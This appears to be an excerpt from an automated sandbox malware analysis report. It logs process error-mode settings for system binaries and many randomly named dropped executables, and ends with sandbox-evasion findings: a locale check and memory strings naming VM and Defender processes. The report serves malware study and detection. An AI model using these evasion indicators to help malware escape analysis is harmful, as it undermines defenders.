                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\DAOYzG6VUKOTbMmRBP4iG9FF.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\363PwSZXj46RramHioCvzZ7q.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\aKsTqJOcX9LAZThGesUnxmZk.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\jBpaTqUJP0LUZLvKSUzQoPLO.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\FnzHBAPEbvEEx8ZWWEvo0R6a.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\YeDvL2xULnFqNNxNLIvjO2b6.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\mlSjlt4YcfcpuVp4aQsoCouK.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\f68SQOWBvY0lqnWRcqakARDI.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Users\user\Pictures\f68SQOWBvY0lqnWRcqakARDI.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\f68SQOWBvY0lqnWRcqakARDI.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\f68SQOWBvY0lqnWRcqakARDI.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\IelNhfi6M4d6yMRgQg9Svn6Z.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\uOoBNdE6Sm5DmPd13osCbhQm.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\23jzBT2gZ2W4aFsNb8WtTEfu.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Users\user\Pictures\23jzBT2gZ2W4aFsNb8WtTEfu.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\23jzBT2gZ2W4aFsNb8WtTEfu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Pictures\23jzBT2gZ2W4aFsNb8WtTEfu.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Found evasive API chain (may stop execution after checking locale)
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_17-79137
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETTL EXPIREDUNINSTALLERVBOXSERVICEVMUSRVC.EXEVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEADDITIONALSALARM CLOCKAPPLICATIONASSISTQUEUEAUTHORITIESBAD ADDRESSBAD ARGSIZEBAD M VALUEBAD MESSAGEBAD TIMEDIVBITCOINS.SKBROKEN PIPECAMPAIGN_IDCGOCALL NILCLOBBERFREECLOSESOCKETCOMBASE.DLLCREATED BY CRYPT32.DLLE2.KEFF.ORGEMBEDDED/%SEXTERNAL IPFILE EXISTSFINAL TOKENFLOAT32NAN2FLOAT64NAN1FLOAT64NAN2FLOAT64NAN3GCCHECKMARKGENERALIZEDGET CDN: %WGETPEERNAMEGETSOCKNAMEGLOBALALLOCHTTP2CLIENTHTTP2SERVERHTTPS_PROXYI/O TIMEOUTLOCAL ERRORMSPANMANUALMETHODARGS(MINTRIGGER=MOVE %S: %WMSWSOCK.DLLNETPOLLINITNEXT SERVERNIL CONTEXTOPERA-PROXYORANNIS.COMOUT OF SYNCPARSE ERRORPROCESS: %SREFLECT.SETREFLECTOFFSRETRY-AFTERRUNTIME: P RUNTIME: G RUNTIME: P SCHEDDETAILSECHOST.DLLSECUR32.DLLSERVICE: %SSHELL32.DLLSHORT WRITESTACK TRACESTART PROXYTASKMGR.EXETLS: ALERT(TRACEALLOC(TRAFFIC UPDUNREACHABLEUSERENV.DLLVERSION.DLLVERSION=195WININET.DLLWUP_PROCESS (SENSITIVE) B (
                        Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: TOO MANY LINKSTOO MANY USERSTORRC FILENAMEUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERUSERARENASTATEVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WINDOW CREATEDWORK.FULL != 0XENSERVICE.EXEZERO PARAMETER WITH GC PROG
